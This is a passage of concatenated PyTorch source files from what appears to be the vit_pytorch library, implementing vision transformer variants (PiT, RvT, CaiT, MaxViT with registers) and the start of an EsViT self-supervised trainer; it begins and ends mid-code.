self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, seq_len, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() assert (seq_len % patch_size) == 0 num_patches = seq_len // patch_size patch_dim = channels * patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (n p) -> b n (p c)', p = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, series): x = self.to_patch_embedding(series) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, 'd -> b d', b = b) x, ps = pack([cls_tokens, x], 'b * d') x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) cls_tokens, _ = unpack(x, ps, 'b * d') return self.mlp_head(cls_tokens) if __name__ == '__main__': v = ViT( seq_len = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) time_series = torch.randn(4, 3, 256) logits = v(time_series) # (4, 1000) File: vit_pytorch/pit.py from math import sqrt import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def cast_tuple(val, num): return val if isinstance(val, tuple) else (val,) * num def conv_output_size(image_size, kernel_size, stride, padding = 0): return int(((image_size - kernel_size + (2 * padding)) / stride) + 1) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): b, n, _, h = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x # depthwise convolution, for pooling class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_out, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.Conv2d(dim_out, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) # pooling layer class Pool(nn.Module): def __init__(self, dim): super().__init__() self.downsample = DepthWiseConv2d(dim, dim * 2, kernel_size = 3, stride = 2, padding = 1) self.cls_ff = nn.Linear(dim, dim * 2) def forward(self, x): cls_token, tokens = x[:, :1], x[:, 1:] cls_token = self.cls_ff(cls_token) tokens = rearrange(tokens, 'b (h w) c -> b c h w', h = int(sqrt(tokens.shape[1]))) tokens = self.downsample(tokens) tokens = rearrange(tokens, 'b c h w -> b (h w) c') return torch.cat((cls_token, tokens), dim = 1) # main class class PiT(nn.Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, dim_head = 64, dropout = 0., emb_dropout = 0., channels = 3 ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' assert isinstance(depth, tuple), 'depth must be a tuple of integers, specifying the number of blocks before each downsizing' heads = cast_tuple(heads, len(depth)) patch_dim = channels * patch_size ** 2 self.to_patch_embedding = nn.Sequential( nn.Unfold(kernel_size = patch_size, stride = patch_size // 2), Rearrange('b c n -> b n c'), nn.Linear(patch_dim, dim) ) output_size = conv_output_size(image_size, patch_size, patch_size // 2) num_patches = output_size ** 2 self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) layers = [] for ind, (layer_depth, layer_heads) in enumerate(zip(depth, heads)): not_last = ind < (len(depth) - 1) layers.append(Transformer(dim, layer_depth, layer_heads, dim_head, mlp_dim, dropout)) if not_last: layers.append(Pool(dim)) dim *= 2 self.layers = nn.Sequential(*layers) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :n+1] x = self.dropout(x) x = self.layers(x) return self.mlp_head(x[:, 0]) File: vit_pytorch/rvt.py from math import sqrt, pi, log import torch from torch import nn, einsum import torch.nn.functional as F from torch.cuda.amp import autocast from einops import rearrange, repeat from einops.layers.torch import Rearrange # rotary embeddings @autocast(enabled = False) def rotate_every_two(x): x = rearrange(x, '... (d j) -> ... d j', j = 2) x1, x2 = x.unbind(dim = -1) x = torch.stack((-x2, x1), dim = -1) return rearrange(x, '... d j -> ... (d j)') class AxialRotaryEmbedding(nn.Module): def __init__(self, dim, max_freq = 10): super().__init__() self.dim = dim scales = torch.linspace(1., max_freq / 2, self.dim // 4) self.register_buffer('scales', scales) @autocast(enabled = False) def forward(self, x): device, dtype, n = x.device, x.dtype, int(sqrt(x.shape[-2])) seq = torch.linspace(-1., 1., steps = n, device = device) seq = seq.unsqueeze(-1) scales = self.scales[(*((None,) * (len(seq.shape) - 1)), Ellipsis)] scales = scales.to(x) seq = seq * scales * pi x_sinu = repeat(seq, 'i d -> i j d', j = n) y_sinu = repeat(seq, 'j d -> i j d', i = n) sin = torch.cat((x_sinu.sin(), y_sinu.sin()), dim = -1) cos = torch.cat((x_sinu.cos(), y_sinu.cos()), dim = -1) sin, cos = map(lambda t: rearrange(t, 'i j d -> (i j) d'), (sin, cos)) sin, cos = map(lambda t: repeat(t, 'n d -> () n (d j)', j = 2), (sin, cos)) return sin, cos class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride = 1, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_in, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.Conv2d(dim_in, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) # helper classes class SpatialConv(nn.Module): def __init__(self, dim_in, dim_out, kernel, bias = False): super().__init__() self.conv = DepthWiseConv2d(dim_in, dim_out, kernel, padding = kernel // 2, bias = False) self.cls_proj = nn.Linear(dim_in, dim_out) if dim_in != dim_out else nn.Identity() def forward(self, x, fmap_dims): cls_token, x = x[:, :1], x[:, 1:] x = rearrange(x, 'b (h w) d -> b d h w', **fmap_dims) x = self.conv(x) x = rearrange(x, 'b d h w -> b (h w) d') cls_token = self.cls_proj(cls_token) return torch.cat((cls_token, x), dim = 1) class GEGLU(nn.Module): def forward(self, x): x, gates = x.chunk(2, dim = -1) return F.gelu(gates) * x class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0., use_glu = True): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim * 2 if use_glu else hidden_dim), GEGLU() if use_glu else nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0., use_rotary = True, use_ds_conv = True, conv_query_kernel = 5): super().__init__() inner_dim = dim_head * heads self.use_rotary = use_rotary self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.use_ds_conv = use_ds_conv self.to_q = SpatialConv(dim, inner_dim, conv_query_kernel, bias = False) if use_ds_conv else nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, pos_emb, fmap_dims): b, n, _, h = *x.shape, self.heads to_q_kwargs = {'fmap_dims': fmap_dims} if self.use_ds_conv else {} x = self.norm(x) q = self.to_q(x, **to_q_kwargs) qkv = (q, *self.to_kv(x).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), qkv) if self.use_rotary: # apply 2d rotary embeddings to queries and keys, excluding CLS tokens sin, cos = pos_emb dim_rotary = sin.shape[-1] (q_cls, q), (k_cls, k) = map(lambda t: (t[:, :1], t[:, 1:]), (q, k)) # handle the case where rotary dimension < head dimension (q, q_pass), (k, k_pass) = map(lambda t: (t[..., :dim_rotary], t[..., dim_rotary:]), (q, k)) q, k = map(lambda t: (t * cos) + (rotate_every_two(t) * sin), (q, k)) q, k = map(lambda t: torch.cat(t, dim = -1), ((q, q_pass), (k, k_pass))) # concat back the CLS tokens q = torch.cat((q_cls, q), dim = 1) k = torch.cat((k_cls, k), dim = 1) dots = einsum('b i d, b j d -> b i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b i j, b j d -> b i d', attn, v) out = rearrange(out, '(b h) n d -> b n (h d)', h = h) return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, image_size, dropout = 0., use_rotary = True, use_ds_conv = True, use_glu = True): super().__init__() self.layers = nn.ModuleList([]) self.pos_emb = AxialRotaryEmbedding(dim_head, max_freq = image_size) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout, use_rotary = use_rotary, use_ds_conv = use_ds_conv), FeedForward(dim, mlp_dim, dropout = dropout, use_glu = use_glu) ])) def forward(self, x, fmap_dims): pos_emb = self.pos_emb(x[:, 1:]) for attn, ff in self.layers: x = attn(x, pos_emb = pos_emb, fmap_dims = fmap_dims) + x x = ff(x) + x return x # Rotary Vision Transformer class RvT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., use_rotary = True, use_ds_conv = True, use_glu = True): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 self.patch_size = patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.Linear(patch_dim, dim), ) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, image_size, dropout, use_rotary, use_ds_conv, use_glu) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): b, _, h, w, p = *img.shape, self.patch_size x = self.to_patch_embedding(img) n = x.shape[1] cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) fmap_dims = {'h': h // p, 'w': w // p} x = self.transformer(x, fmap_dims = fmap_dims) return self.mlp_head(x[:, 0]) File: vit_pytorch/cait.py from random import randrange import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def dropout_layers(layers, dropout): if dropout == 0: return layers num_layers = len(layers) to_drop = torch.zeros(num_layers).uniform_(0., 1.) < dropout # make sure at least one layer makes it if all(to_drop): rand_index = randrange(num_layers) to_drop[rand_index] = False layers = [layer for (layer, drop) in zip(layers, to_drop) if not drop] return layers # classes class LayerScale(nn.Module): def __init__(self, dim, fn, depth): super().__init__() if depth <= 18: # epsilon detailed in section 2 of paper init_eps = 0.1 elif depth > 18 and depth <= 24: init_eps = 1e-5 else: init_eps = 1e-6 scale = torch.zeros(1, 1, dim).fill_(init_eps) self.scale = nn.Parameter(scale) self.fn = fn def forward(self, x, **kwargs): return self.fn(x, **kwargs) * self.scale class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.mix_heads_pre_attn = nn.Parameter(torch.randn(heads, heads)) self.mix_heads_post_attn = nn.Parameter(torch.randn(heads, heads)) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, context = None): b, n, _, h = *x.shape, self.heads x = self.norm(x) context = x if not exists(context) else torch.cat((x, context), dim = 1) qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale dots = einsum('b h i j, h g -> b g i j', dots, self.mix_heads_pre_attn) # talking heads, pre-softmax attn = self.attend(dots) attn = self.dropout(attn) attn = einsum('b h i j, h g -> b g i j', attn, self.mix_heads_post_attn) # talking heads, post-softmax out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0., layer_dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) self.layer_dropout = layer_dropout for ind in range(depth): self.layers.append(nn.ModuleList([ LayerScale(dim, Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), depth = ind + 1), LayerScale(dim, FeedForward(dim, mlp_dim, dropout = dropout), depth = ind + 1) ])) def forward(self, x, context = None): layers = dropout_layers(self.layers, dropout = self.layer_dropout) for attn, ff in layers: x = attn(x, context = context) + x x = ff(x) + x return x class CaiT(nn.Module): def __init__( self, *, image_size, patch_size, num_classes, dim, depth, cls_depth, heads, mlp_dim, dim_head = 64, dropout = 0., emb_dropout = 0., layer_dropout = 0. ): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = 3 * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.patch_transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout, layer_dropout) self.cls_transformer = Transformer(dim, cls_depth, heads, dim_head, mlp_dim, dropout, layer_dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape x += self.pos_embedding[:, :n] x = self.dropout(x) x = self.patch_transformer(x) cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = self.cls_transformer(cls_tokens, context = x) return self.mlp_head(x[:, 0]) File: vit_pytorch/max_vit_with_registers.py from functools import partial import torch from torch import nn, einsum import torch.nn.functional as F from torch.nn import Module, ModuleList, Sequential from einops import rearrange, repeat, reduce, pack, unpack from einops.layers.torch import Rearrange, Reduce # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pack_one(x, pattern): return pack([x], pattern) def unpack_one(x, ps, pattern): return unpack(x, ps, pattern)[0] def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # helper classes def FeedForward(dim, mult = 4, dropout = 0.): inner_dim = int(dim * mult) return Sequential( nn.LayerNorm(dim), nn.Linear(dim, inner_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) # MBConv class SqueezeExcitation(Module): def __init__(self, dim, shrinkage_rate = 0.25): super().__init__() hidden_dim = int(dim * shrinkage_rate) self.gate = Sequential( Reduce('b c h w -> b c', 'mean'), nn.Linear(dim, hidden_dim, bias = False), nn.SiLU(), nn.Linear(hidden_dim, dim, bias = False), nn.Sigmoid(), Rearrange('b c -> b c 1 1') ) def forward(self, x): return x * self.gate(x) class MBConvResidual(Module): def __init__(self, fn, dropout = 0.): super().__init__() self.fn = fn self.dropsample = Dropsample(dropout) def forward(self, x): out = self.fn(x) out = self.dropsample(out) return out + x class Dropsample(Module): def __init__(self, prob = 0): super().__init__() self.prob = prob def forward(self, x): device = x.device if self.prob == 0. or (not self.training): return x keep_mask = torch.FloatTensor((x.shape[0], 1, 1, 1), device = device).uniform_() > self.prob return x * keep_mask / (1 - self.prob) def MBConv( dim_in, dim_out, *, downsample, expansion_rate = 4, shrinkage_rate = 0.25, dropout = 0. ): hidden_dim = int(expansion_rate * dim_out) stride = 2 if downsample else 1 net = Sequential( nn.Conv2d(dim_in, hidden_dim, 1), nn.BatchNorm2d(hidden_dim), nn.GELU(), nn.Conv2d(hidden_dim, hidden_dim, 3, stride = stride, padding = 1, groups = hidden_dim), nn.BatchNorm2d(hidden_dim), nn.GELU(), SqueezeExcitation(hidden_dim, shrinkage_rate = shrinkage_rate), nn.Conv2d(hidden_dim, dim_out, 1), nn.BatchNorm2d(dim_out) ) if dim_in == dim_out and not downsample: net = MBConvResidual(net, dropout = dropout) return net # attention related classes class Attention(Module): def __init__( self, dim, dim_head = 32, dropout = 0., window_size = 7, num_registers = 1 ): super().__init__() assert num_registers > 0 assert (dim % dim_head) == 0, 'dimension should be divisible by dimension per head' self.heads = dim // dim_head self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, dim * 3, bias = False) self.attend = nn.Sequential( nn.Softmax(dim = -1), nn.Dropout(dropout) ) self.to_out = nn.Sequential( nn.Linear(dim, dim, bias = False), nn.Dropout(dropout) ) # relative positional bias num_rel_pos_bias = (2 * window_size - 1) ** 2 self.rel_pos_bias = nn.Embedding(num_rel_pos_bias + 1, self.heads) pos = torch.arange(window_size) grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) grid = rearrange(grid, 'c i j -> (i j) c') rel_pos = rearrange(grid, 'i ... -> i 1 ...') - rearrange(grid, 'j ... -> 1 j ...') rel_pos += window_size - 1 rel_pos_indices = (rel_pos * torch.tensor([2 * window_size - 1, 1])).sum(dim = -1) rel_pos_indices = F.pad(rel_pos_indices, (num_registers, 0, num_registers, 0), value = num_rel_pos_bias) self.register_buffer('rel_pos_indices', rel_pos_indices, persistent = False) def forward(self, x): device, h, bias_indices = x.device, self.heads, self.rel_pos_indices x = self.norm(x) # project for queries, keys, values q, k, v = self.to_qkv(x).chunk(3, dim = -1) # split heads q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), (q, k, v)) # scale q = q * self.scale # sim sim = einsum('b h i d, b h j d -> b h i j', q, k) # add positional bias bias = self.rel_pos_bias(bias_indices) sim = sim + rearrange(bias, 'i j h -> h i j') # attention attn = self.attend(sim) # aggregate out = einsum('b h i j, b h j d -> b h i d', attn, v) # combine heads out out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class MaxViT(Module): def __init__( self, *, num_classes, dim, depth, dim_head = 32, dim_conv_stem = None, window_size = 7, mbconv_expansion_rate = 4, mbconv_shrinkage_rate = 0.25, dropout = 0.1, channels = 3, num_register_tokens = 4 ): super().__init__() assert isinstance(depth, tuple), 'depth needs to be tuple if integers indicating number of transformer blocks at that stage' assert num_register_tokens > 0 # convolutional stem dim_conv_stem = default(dim_conv_stem, dim) self.conv_stem = Sequential( nn.Conv2d(channels, dim_conv_stem, 3, stride = 2, padding = 1), nn.Conv2d(dim_conv_stem, dim_conv_stem, 3, padding = 1) ) # variables num_stages = len(depth) dims = tuple(map(lambda i: (2 ** i) * dim, range(num_stages))) dims = (dim_conv_stem, *dims) dim_pairs = tuple(zip(dims[:-1], dims[1:])) self.layers = nn.ModuleList([]) # window size self.window_size = window_size self.register_tokens = nn.ParameterList([]) # iterate through stages for ind, ((layer_dim_in, layer_dim), layer_depth) in enumerate(zip(dim_pairs, depth)): for stage_ind in range(layer_depth): is_first = stage_ind == 0 stage_dim_in = layer_dim_in if is_first else layer_dim conv = MBConv( stage_dim_in, layer_dim, downsample = is_first, expansion_rate = mbconv_expansion_rate, shrinkage_rate = mbconv_shrinkage_rate ) block_attn = Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = window_size, num_registers = num_register_tokens) block_ff = FeedForward(dim = layer_dim, dropout = dropout) grid_attn = Attention(dim = layer_dim, dim_head = dim_head, dropout = dropout, window_size = window_size, num_registers = num_register_tokens) grid_ff = FeedForward(dim = layer_dim, dropout = dropout) register_tokens = nn.Parameter(torch.randn(num_register_tokens, layer_dim)) self.layers.append(ModuleList([ conv, ModuleList([block_attn, block_ff]), ModuleList([grid_attn, grid_ff]) ])) self.register_tokens.append(register_tokens) # mlp head out self.mlp_head = nn.Sequential( Reduce('b d h w -> b d', 'mean'), nn.LayerNorm(dims[-1]), nn.Linear(dims[-1], num_classes) ) def forward(self, x): b, w = x.shape[0], self.window_size x = self.conv_stem(x) for (conv, (block_attn, block_ff), (grid_attn, grid_ff)), register_tokens in zip(self.layers, self.register_tokens): x = conv(x) # block-like attention x = rearrange(x, 'b d (x w1) (y w2) -> b x y w1 w2 d', w1 = w, w2 = w) # prepare register tokens r = repeat(register_tokens, 'n d -> b x y n d', b = b, x = x.shape[1],y = x.shape[2]) r, register_batch_ps = pack_one(r, '* n d') x, window_ps = pack_one(x, 'b x y * d') x, batch_ps = pack_one(x, '* n d') x, register_ps = pack([r, x], 'b * d') x = block_attn(x) + x x = block_ff(x) + x r, x = unpack(x, register_ps, 'b * d') x = unpack_one(x, batch_ps, '* n d') x = unpack_one(x, window_ps, 'b x y * d') x = rearrange(x, 'b x y w1 w2 d -> b d (x w1) (y w2)') r = unpack_one(r, register_batch_ps, '* n d') # grid-like attention x = rearrange(x, 'b d (w1 x) (w2 y) -> b x y w1 w2 d', w1 = w, w2 = w) # prepare register tokens r = reduce(r, 'b x y n d -> b n d', 'mean') r = repeat(r, 'b n d -> b x y n d', x = x.shape[1], y = x.shape[2]) r, register_batch_ps = pack_one(r, '* n d') x, window_ps = pack_one(x, 'b x y * d') x, batch_ps = pack_one(x, '* n d') x, register_ps = pack([r, x], 'b * d') x = grid_attn(x) + x r, x = unpack(x, register_ps, 'b * d') x = grid_ff(x) + x x = unpack_one(x, batch_ps, '* n d') x = unpack_one(x, window_ps, 'b x y * d') x = rearrange(x, 'b x y w1 w2 d -> b d (w1 x) (w2 y)') return self.mlp_head(x) File: vit_pytorch/es_vit.py import copy import random from functools import wraps, partial import torch from torch import nn, einsum import torch.nn.functional as F from torchvision import transforms as T from einops import rearrange, reduce, repeat # helper functions def exists(val): return val is not None def default(val, default): return val if exists(val) else default def singleton(cache_key): def inner_fn(fn): @wraps(fn) def wrapper(self, *args, **kwargs): instance = getattr(self, cache_key) if instance is not None: return instance instance = fn(self, *args, **kwargs) setattr(self, cache_key, instance) return instance return wrapper return inner_fn def get_module_device(module): return next(module.parameters()).device def set_requires_grad(model, val): for p in model.parameters(): p.requires_grad = val # tensor related helpers def log(t, eps = 1e-20): return torch.log(t + eps) # loss function # (algorithm 1 in the paper) def view_loss_fn( teacher_logits, student_logits, teacher_temp, student_temp, centers, eps = 1e-20 ): teacher_logits = teacher_logits.detach() student_probs = (student_logits / student_temp).softmax(dim = -1) teacher_probs = ((teacher_logits - centers) / teacher_temp).softmax(dim = -1) return - (teacher_probs * log(student_probs, eps)).sum(dim = -1).mean() def region_loss_fn( teacher_logits, student_logits, teacher_latent, student_latent, teacher_temp, student_temp, centers, eps = 1e-20 ): teacher_logits = teacher_logits.detach() student_probs = (student_logits / student_temp).softmax(dim = -1) teacher_probs = ((teacher_logits - centers) / teacher_temp).softmax(dim = -1) sim_matrix = einsum('b i d, b j d -> b i j', student_latent, teacher_latent) sim_indices = sim_matrix.max(dim = -1).indices sim_indices = repeat(sim_indices, 'b n -> b n k', k = teacher_probs.shape[-1]) max_sim_teacher_probs = teacher_probs.gather(1, sim_indices) return - (max_sim_teacher_probs * log(student_probs, eps)).sum(dim = -1).mean() # augmentation utils class RandomApply(nn.Module): def __init__(self, fn, p): super().__init__() self.fn = fn self.p = p def forward(self, x): if random.random() > self.p: return x return self.fn(x) # exponential moving average class EMA(): def __init__(self, beta): super().__init__() self.beta = beta def update_average(self, old, new): if old is None: return new return old * self.beta + (1 - self.beta) * new def update_moving_average(ema_updater, ma_model, current_model): for current_params, ma_params in zip(current_model.parameters(), ma_model.parameters()): old_weight, up_weight = ma_params.data, current_params.data ma_params.data = ema_updater.update_average(old_weight, up_weight) # MLP class for projector and predictor class L2Norm(nn.Module): def forward(self, x, eps = 1e-6): return F.normalize(x, dim = 1, eps = eps) class MLP(nn.Module): def __init__(self, dim, dim_out, num_layers, hidden_size = 256): super().__init__() layers = [] dims = (dim, *((hidden_size,) * (num_layers - 1))) for ind, (layer_dim_in, layer_dim_out) in enumerate(zip(dims[:-1], dims[1:])): is_last = ind == (len(dims) - 1) layers.extend([ nn.Linear(layer_dim_in, layer_dim_out), nn.GELU() if not is_last else nn.Identity() ]) self.net = nn.Sequential( *layers, L2Norm(), nn.Linear(hidden_size, dim_out) ) def forward(self, x): return self.net(x) # a wrapper class for the base neural network # will manage the interception of the hidden layer output # and pipe it into the projecter and predictor nets class NetWrapper(nn.Module): def __init__(self, net, output_dim, projection_hidden_size, projection_num_layers, layer = -2): super().__init__() self.net = net self.layer = layer self.view_projector = None self.region_projector = None self.projection_hidden_size = projection_hidden_size self.projection_num_layers = projection_num_layers self.output_dim = output_dim self.hidden = {} self.hook_registered = False def _find_layer(self): if type(self.layer) == str: modules = dict([*self.net.named_modules()]) return modules.get(self.layer, None) elif type(self.layer) == int: children = [*self.net.children()] return children[self.layer] return None def _hook(self, _, input, output): device = input[0].device self.hidden[device] = output def _register_hook(self): layer = self._find_layer() assert layer is not None, f'hidden layer ({self.layer}) not found' handle = layer.register_forward_hook(self._hook) self.hook_registered = True @singleton('view_projector') def _get_view_projector(self, hidden): dim = hidden.shape[1] projector = MLP(dim, self.output_dim, self.projection_num_layers, self.projection_hidden_size) return projector.to(hidden) @singleton('region_projector') def _get_region_projector(self, hidden): dim = hidden.shape[1] projector = MLP(dim, self.output_dim, self.projection_num_layers, self.projection_hidden_size) return projector.to(hidden) def get_embedding(self, x): if self.layer == -1: return self.net(x) if not self.hook_registered: self._register_hook() self.hidden.clear() _ = self.net(x) hidden = self.hidden[x.device] self.hidden.clear() assert hidden is not None, f'hidden layer {self.layer} never emitted an output' return hidden def forward(self, x, return_projection = True): region_latents = self.get_embedding(x) global_latent = reduce(region_latents, 'b c h w -> b c', 'mean') if not return_projection: return global_latent, region_latents view_projector = self._get_view_projector(global_latent) region_projector = self._get_region_projector(region_latents) region_latents = rearrange(region_latents, 'b c h w -> b (h w) c') return view_projector(global_latent), region_projector(region_latents), region_latents # main class class EsViTTrainer(nn.Module): def __init__( self, net, image_size, hidden_layer = -2, projection_hidden_size = 256, num_classes_K = 65336, projection_layers = 4, student_temp = 0.9, teacher_temp = 0.04, local_upper_crop_scale = 0.4, global_lower_crop_scale = 0.5, moving_average_decay = 